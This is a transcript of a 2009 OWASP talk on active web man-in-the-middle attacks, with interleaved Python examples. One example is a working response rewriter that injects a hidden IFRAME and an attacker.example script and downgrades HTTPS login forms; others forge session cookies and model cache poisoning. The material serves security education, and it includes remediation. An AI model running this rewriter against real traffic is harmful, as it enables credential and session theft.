IBM Rational Application Security Group (aka Watchfire), Web Based Man In the Middle Attack, © 2009 IBM Corporation

Slide 1: Active Man in the Middle Attacks
The OWASP Foundation, OWASP, 27/02/2009
Adi Sharabani, Security Research Group Manager, IBM Rational Application Security (a.k.a. Watchfire), adish

Slide 2: Agenda
- Background: Man in the Middle; network level (heavily researched); web application level (sporadic research)
- Outline: passive MitM attacks; active MitM attacks; penetrating an internal network; remediation

Slide 3: Man in the Middle Scenario
- All laptop users connect to a public network
- A wireless connection can easily be compromised or impersonated
- Wired connections might also be compromised
[Figure: laptops reaching the Internet through the shared network]

Slide 4: Rules of Thumb, Don'ts
- Someone might be listening to the requests: don't browse sensitive sites; don't supply sensitive information
- Someone might be altering the responses: don't trust any information given on web sites; don't execute downloaded code

Slide 5: Rules of Thumb, What Can You Do?
- This leaves us with: browse your favorite news site; browse your favorite weather site
[Figure: non-sensitive sites ("boring") versus sensitive sites ("interesting")]

Slide 6: You are still vulnerable

Slide 7: Mitigating a Fallacy
- Fallacy: executing JavaScript on the victim == executing an attack
- Reality: the same origin policy confines a script to the origin that served it. Turning script execution into an attack needs either JavaScript plus a browser implementation bug, or JavaScript that runs in the context of a specific (target) domain, which is what XSS provides.

Slide 8: Passive Man in the Middle Attacks
1. Victim browses to a website
2. Attacker views the request, manipulates it and forwards it to the server
3. Server returns a response
4. Attacker views the response, manipulates it and forwards it to the victim
Other servers are not affected.

Slide 9: Active Man in the Middle Attack
- The attacker actively directs the victim to an "interesting" site
- The IFRAME could be invisible
1. Victim browses to a "boring" site (My Weather Channel)
2. Attacker forwards the request to the server
3. Server returns a response
4. Attacker adds an IFRAME referencing an "interesting" site (My Bank Site)
5. The victim's browser sends an automatic request to the interesting server
Other servers are not affected.

Slide 10: (figure only)

Slide 11: Stealing Cookies*
- The automatic request contains the victim's cookies for the interesting domain
- Obvious result: stealing cookies associated with any domain the attacker desires
- Also works for HttpOnly cookies (as opposed to XSS attacks), because the cookies are read from the request on the wire rather than through document.cookie; cookies flagged Secure are not sent over plain HTTP and stay out of reach
* A similar attack was presented by Mike Perry: SideJacking

Slide 12: Demo

Slide 13: Overcoming Same Origin Policy
1. Victim surfs to a "boring" site
2. Attacker injects an IFRAME directing to an "interesting" site
3. Automatic request sent to the interesting server
4. Attacker forwards the automatic request to the "interesting" server
5. "Interesting" server returns a response
6. Attacker adds a malicious script to the response
7. Script executes with the "interesting" server's restrictions, i.e. under that origin
- Result: attacker can execute scripts on any domain she desires; scripts can fully interact with any "interesting" website
- Limitations: only works for non-SSL web sites

Slide 14: Secure Connections, Login Mechanism

Slide 15: Secure Connections
1. Victim browses to the site (over plain HTTP)
2. Site returns a response with the login form ("Please Login", Username, Password, SUBMIT)
3. Victim fills in login details (jsmith / ********) and submits the form
4. Login request is sent through a secure channel; "Login Successful. Hello John Smith"
- The pre-login page is sent in clear text
- The attacker could alter the pre-login response so that the login request is sent unencrypted, for instance by rewriting the form's https:// action to http://
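The three rewrites in slides 9, 13 and 15 (hidden IFRAME on the boring site, script injection into the interesting site's response, downgrading the pre-login form) are all edits to a plain-HTTP response on its way back to the victim. The following Python is an added example, not code from the presentation or from IBM/Watchfire: it performs those rewrites on raw HTTP/1.1 messages and keeps Content-Length consistent. The host names, the script URL and the sample pages are assumptions constructed for the example.

```python
import re

# Assumptions for the example: which hosts play which role and where the
# attacker's script is served from. None of these names come from the slides.
BORING_HOSTS = {"weather.example"}
INTERESTING_HOSTS = {"bank.example"}
HIDDEN_IFRAME = ('<iframe src="http://bank.example/" width="0" height="0" '
                 'style="display:none"></iframe>')
PAYLOAD_SCRIPT = '<script src="http://attacker.example/p.js"></script>'


def split_message(raw: bytes):
    """Split a raw HTTP/1.x message into (start line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP message")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name):
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def inject(html: str, snippet: str) -> str:
    """Place the snippet just before </body>, or at the end if there is none."""
    idx = html.lower().rfind("</body>")
    return html + snippet if idx < 0 else html[:idx] + snippet + html[idx:]


def rewrite_response(host: str, raw: bytes) -> bytes:
    """Return the response the victim should receive for a page from `host`."""
    start, headers, body = split_message(raw)
    ctype = (get_header(headers, "Content-Type") or "").lower()
    # Only plain, uncompressed HTML with a known length is rewritten. A real
    # interception point strips Accept-Encoding from the request so the server
    # never compresses, and reassembles chunked bodies; both are left out here.
    if (not ctype.startswith("text/html")
            or get_header(headers, "Content-Encoding")
            or get_header(headers, "Transfer-Encoding")):
        return raw
    html = body.decode("latin-1")
    if host in BORING_HOSTS:
        # Slide 9: the boring page now drags the browser to the interesting site.
        html = inject(html, HIDDEN_IFRAME)
    elif host in INTERESTING_HOSTS:
        # Slide 13: this script will run under the interesting site's origin.
        html = inject(html, PAYLOAD_SCRIPT)
        # Slide 15: a pre-login form that posted over HTTPS now posts over HTTP.
        html = re.sub(r'(action\s*=\s*["\'])https://', r'\1http://', html, flags=re.I)
    else:
        return raw
    new_body = html.encode("latin-1")
    kept = [(n, v) for n, v in headers if n.lower() != "content-length"]
    kept.append(("Content-Length", str(len(new_body))))
    head = "\r\n".join([start] + [f"{n}: {v}" for n, v in kept])
    return head.encode("latin-1") + b"\r\n\r\n" + new_body


def make_response(body: bytes, content_type="text/html; charset=utf-8", extra=()) -> bytes:
    """Build a well-formed HTTP/1.1 200 response (used only for constructed input)."""
    lines = ["HTTP/1.1 200 OK", f"Content-Type: {content_type}",
             f"Content-Length: {len(body)}"] + [f"{n}: {v}" for n, v in extra]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


# Constructed sample traffic, not captured from any real site.
WEATHER_PAGE = make_response(b"<html><body><h1>Weather</h1></body></html>")
BANK_LOGIN_PAGE = make_response(
    b'<html><body><form action="https://bank.example/login" method="post">'
    b'<input name="user"><input name="pass" type="password"></form></body></html>')
GZIPPED_PAGE = make_response(b"\x1f\x8b...", extra=[("Content-Encoding", "gzip")])

if __name__ == "__main__":
    print(rewrite_response("weather.example", WEATHER_PAGE).decode("latin-1"))
    print(rewrite_response("bank.example", BANK_LOGIN_PAGE).decode("latin-1"))
```

The script injected on the interesting site runs under that site's origin, which is what makes the same-origin policy irrelevant here; the cookies of slide 11 are read from the automatic request's Cookie header at the same interception point, not by the script, which is why HttpOnly does not help.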

Slide 16: Stealing Auto-Completion Information
1. Attacker redirects the victim to a pre-login page
2. Attacker returns the original login form together with a malicious script
3. Script accesses the auto-completion information through the DOM
* A passive version of this attack was described by RSnake on his blog
- Result: attacker can steal any auto-completion information she desires
- Limitations: only works for pre-login pages that are not encrypted; will not work seamlessly in IE

Slide 17: Demo

Slide 18: Broadening the Attack (Time Dimension)

Slide 19: Time dimension of the two attack classes
- Passive MitM attacks: present ("boring" sites only)
- Active MitM attacks: present ("boring" sites); past ("interesting" sites: data the browser already holds); future ("interesting" sites: data the attacker plants for later)

Slide 20: Session Fixation
1. Attacker redirects the victim to the site of interest
2. Attacker returns a page carrying a cookie that was generated by the server
3. Cookie is saved on the victim's computer
4. A while later, the victim connects to the site with the pre-provided cookie
5. Attacker uses the same cookie to connect to the server
6. Server authenticates the attacker as the victim
- Result: attacker can set persistent cookies on the victim
- Limitations: the vulnerability also lies within the server, which must keep honouring the same session identifier across the victim's login
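Slide 20's last bullet is the important one: fixation only works if the server keeps treating the planted identifier as the victim's session after login. The following Python is an added example, not from the presentation: a toy session store replayed once without and once with identifier regeneration at login, plus the forged response the attacker uses to plant the cookie. Credentials, host name and cookie name are constructed for the example.

```python
import hmac
import secrets

# Constructed credential store for the example; not part of the slides.
VALID_PASSWORDS = {"jsmith": "correct horse battery staple"}


def check_password(user: str, password: str) -> bool:
    expected = VALID_PASSWORDS.get(user, "")
    return bool(expected) and hmac.compare_digest(expected, password)


class SessionStore:
    """Server-side session handling; `regenerate_on_login` toggles the fix."""

    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}  # session id -> session attributes

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {}
        return sid

    def handle_request(self, cookie_sid, credentials=None):
        """Process one request; returns (session id the client should keep, session)."""
        sid = cookie_sid if cookie_sid in self.sessions else None
        if sid is None:
            sid = self.new_session()  # unknown or absent id: start fresh
        session = self.sessions[sid]
        if credentials is not None and check_password(*credentials):
            if self.regenerate_on_login:
                # Fixed server: a privilege change gets a fresh identifier, so an
                # identifier planted before login never becomes an authenticated one.
                del self.sessions[sid]
                sid = self.new_session()
                self.sessions[sid] = session
            # Vulnerable server: the pre-login identifier simply becomes the
            # authenticated session, whoever else happens to know it.
            session["user"] = credentials[0]
        return sid, session


def forged_cookie_response(domain: str, sid: str) -> bytes:
    """Step 2 of the slide: the attacker's response plants a persistent cookie."""
    return (b"HTTP/1.1 200 OK\r\n"
            b"Set-Cookie: SESSIONID=" + sid.encode() + b"; Domain=" + domain.encode()
            + b"; Path=/; Expires=Thu, 31 Dec 2037 23:59:59 GMT\r\n"
            b"Content-Length: 0\r\n\r\n")


def run_fixation_attack(regenerate_on_login: bool):
    """Replays slide 20; returns (planted id, victim's id after login, user the attacker gets)."""
    server = SessionStore(regenerate_on_login)
    planted, _ = server.handle_request(None)  # attacker obtains a server-generated id
    forged = forged_cookie_response("bank.example", planted)  # delivered via active MitM
    assert b"Set-Cookie: SESSIONID=" + planted.encode() in forged
    # A while later, the victim visits with the planted cookie and logs in.
    victim_sid, _ = server.handle_request(
        planted, credentials=("jsmith", "correct horse battery staple"))
    # The attacker presents the same planted identifier.
    _, attacker_view = server.handle_request(planted)
    return planted, victim_sid, attacker_view.get("user")


if __name__ == "__main__":
    print("vulnerable server:", run_fixation_attack(regenerate_on_login=False)[2])
    print("fixed server:     ", run_fixation_attack(regenerate_on_login=True)[2])
```

The only difference between the two runs is whether the identifier is replaced when the session gains privileges; with regeneration the attacker's copy of the cookie points at a session that no longer exists, and a fresh empty one is created for it instead.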

Slide 21: Cache Poisoning
1. Attacker redirects the victim to the site of interest
2. Attacker returns a malicious page with caching enabled
3. Page is cached on the victim's computer
4. A while later, the victim visits the site and the cached page is served
- Result: attacker can poison any page she desires; poisoned pages are persistent
- Limitations: only non-SSL resources can be poisoned

Slide 22: Demo

Slide 23: Complex Hacking, Virtual Private Networks

Slide 24: Virtual Private Networks (VPN)
- VPN client initialization: create a secure network interface; set the user's routing table
- VPN client finalization (upon exit or when the connection is lost): revert the routing table
- Do not confuse VPN and HTTPS architectures! The VPN protects the path between the client and the VPN gateway; it says nothing about what the browser already cached or loads from outside the tunnel.

Slide 25: VPN Mixed Content
1. Victim surfs to a page in the VPN network (an internal web site that references a script fetched over plain HTTP from outside the tunnel)
2. Attacker alters the non-encrypted script
3. Malicious script executes within the secure environment
- Result: VPN web sites are compromised; the user is not alerted to the security risk (as opposed to SSL mixed-content warnings)
- Limitations: such mixed content is not widely used

Slide 26: Hacking Non-Available Sites
- Result: attacker can view and change any HTTP cache object, even for sites that are not reachable from the current network

Slide 27: VPN Cache Injection
1. Attacker disconnects the connection to the VPN server
2. After the routing table is reverted, the attacker poisons the cache of an internal site
3. Attacker lets the connection recover
4. Attacker redirects the victim to the cached resource
5. Cached resource loads and the malicious cached script executes
- Result: VPN is great for the network level but not enough for the application level; this attack could be applied to other application protocols!
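Slides 21, 26 and 27 rest on one mechanism: the browser keeps serving a poisoned object for as long as the attacker-chosen freshness lifetime lasts, whether or not the genuine origin is reachable. The Python below is an added example, not from the presentation: a minimal model of a browser cache that honours Cache-Control and Expires, replaying the VPN cache injection timeline of slide 27 and showing the cache-key change that the "random tokens" remediation on slide 35 relies on. URLs, timestamps and page bodies are constructed for the example.

```python
import email.utils


def freshness_lifetime(headers: dict, now: float):
    """Seconds a response may be served without revalidation, or None if it
    must not be stored. Cache-Control wins over Expires, as in RFC 7234;
    heuristic freshness (derived from Last-Modified) is deliberately omitted."""
    h = {k.lower(): v for k, v in headers.items()}
    directives = {}
    for item in h.get("cache-control", "").split(","):
        name, _, value = item.strip().partition("=")
        if name:
            directives[name.lower()] = value
    if "no-store" in directives or "no-cache" in directives:
        return None
    if "max-age" in directives:
        return float(directives["max-age"])
    if "expires" in h:
        expires = email.utils.parsedate_to_datetime(h["expires"]).timestamp()
        return max(0.0, expires - now)
    return None


class BrowserCache:
    """Tiny model of a browser cache keyed by URL."""

    def __init__(self):
        self.entries = {}  # url -> (fresh_until, body)

    def store(self, url, headers, body, now) -> bool:
        lifetime = freshness_lifetime(headers, now)
        if lifetime is None or lifetime <= 0:
            return False
        self.entries[url] = (now + lifetime, body)
        return True

    def fetch(self, url, now, origin=None):
        """Serve a fresh entry from cache; otherwise ask `origin` (a callable
        url -> (headers, body)) or fail when no origin is reachable."""
        entry = self.entries.get(url)
        if entry is not None and now < entry[0]:
            return "cache", entry[1]
        if origin is None:
            raise ConnectionError(f"{url} is unreachable and not cached")
        headers, body = origin(url)
        self.store(url, headers, body, now)
        return "network", body


# Constructed sample responses; the host names are placeholders.
INTERNAL_URL = "http://intranet.example/portal/"
POISON_HEADERS = {"Content-Type": "text/html", "Cache-Control": "max-age=31536000"}
POISON_BODY = b'<html><body><script src="http://attacker.example/p.js"></script></body></html>'
GENUINE_HEADERS = {"Content-Type": "text/html", "Cache-Control": "no-store"}
GENUINE_BODY = b"<html><body>Internal portal</body></html>"


def genuine_origin(url):
    """Stands in for the real internal server once the tunnel is back."""
    return GENUINE_HEADERS, GENUINE_BODY


def vpn_cache_injection_scenario():
    """Replays slide 27: poison while the tunnel is down, collect afterwards."""
    cache = BrowserCache()
    t0 = 1_233_000_000.0  # arbitrary epoch for the constructed timeline
    # Steps 1-2: tunnel down, the attacker answers for the internal host and
    # marks the page fresh for a year.
    cache.store(INTERNAL_URL, POISON_HEADERS, POISON_BODY, now=t0)
    # Steps 3-5: tunnel back up. The genuine origin is reachable, but the
    # browser never asks it because the poisoned entry is still fresh.
    served_with_vpn = cache.fetch(INTERNAL_URL, now=t0 + 3600, origin=genuine_origin)
    # Slide 26: with the origin unreachable the poisoned object is still served.
    served_offline = cache.fetch(INTERNAL_URL, now=t0 + 7 * 86400, origin=None)
    return served_with_vpn, served_offline


def cache_busted_fetch(cache, token, now):
    """Slide 35's remediation: a random token in the URL changes the cache key,
    so a poisoned entry stored under the bare URL is never consulted."""
    return cache.fetch(f"{INTERNAL_URL}?v={token}", now=now, origin=genuine_origin)


if __name__ == "__main__":
    print(vpn_cache_injection_scenario())
```

Real browsers revalidate stale entries with If-Modified-Since or If-None-Match, which is why the attacker sets a far-future lifetime rather than relying on heuristics; the token approach works only if the token is not guessable in advance, since a known token is just another poisonable URL.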

Slide 28: Complex Hacking, Intranet Networks

Slide 29: Penetrating Internal Network, Simple Cache Poison
- Result: the attack is launched every time the victim accesses the resource, and it executes within the local intranet
- Characteristics: firewall protections are helpless; affected servers will never know; the attack is persistent

Slide 30: Setting Up a Future MitM Scenario
Using active MitM techniques, the attacker poisons the victim's cache related to his router's web access.
1. Victim's router-related cache is poisoned with a malicious script
2. Malicious script is executed when the victim tries to access the router
3. Script configures the router to tunnel future communication through the attacker (outbound proxy IP address, primary DNS server address)
4. Script hides the configuration changes
- Result: facilitates future MitM scenarios; does not require the router's credentials; fake settings could be displayed to the user
- Limitations: requires the victim to access the router in the future; need to guess the router's address ( )

Slide 31: Increasing the Exposure
- Poison common home pages: the script executes every time the victim opens his browser
- Poison common scripts: the script executes on every page using the common script (example .JS library omitted in the transcript)
- The "double active" attack: a common poisoned page redirects to another poisoned resource

Slide 32: The Double Active Cache Poisoning Attack
1. Using active MitM techniques, the attacker poisons the common router's address (i.e. )
2. Attacker also poisons common home pages
3. At a later time, the victim opens the browser
4. Cached home page is loaded and redirects the victim's browser to the router's web interface
5. Cached router web interface is loaded and the malicious script changes the router's settings
6. Router is compromised by the malicious script
- Result: internal network has been compromised
- Limitation: need to guess the router's IP and credentials

Slide 33: Active Attack Characteristics
- Not noticeable in the user's experience
- Not noticeable by any of the web sites
- IPS/IDS will not block it
- Can be persistent
- Can be used to hack into the local organization
- Bypasses any firewall or VPN
- Can be used with DNS pinning techniques
- A problem with the current design
- Requires only one plain HTTP request to be transmitted

Slide 34: Remediation, Users
- Do not use auto-completion
- "Clean slate policy": start each session with an empty cache and cookie jar
- Trust level separation: two different browsers, two different users, two different OSes, virtualization products
- Tunnel communication through a secure proxy (might not be allowed in many hot-spots)

Slide 35: Remediation, Web Owners
- Consider the risks of partial-SSL sites
- Do not consider a secure VPN connection an SSL replacement
- Use random tokens for common scripts, so that a poisoned cache entry is never hit, while considering the performance cost of losing cacheability
- Avoid referring to external scripts from internal sites

Slide 36: Remediation, Industry
- Build an integrity mechanism for HTTP
- Secure WiFi networks

Slide 37: Summary
- Active MitM attacks broaden the scope of the passive attacks
- Design issues
- Dimension of time: past (steal cookies, auto-completion information, cache); future (set up cookies, poison cache, poison form filler)
- Penetrating internal networks
- Persistent
- Bypass any current protection mechanisms
More information: the paper and presentation will be uploaded to our blog (link not preserved in the transcript)

Slide 38: References (links not preserved in the transcript)
- Watchfire's Blog
- Wireless Man in the Middle Attacks
- SideJacking
- More on SideJacking
- Active SideJacking
- Surf Jacking
- Stealing User Information

Slide 39: Thank you!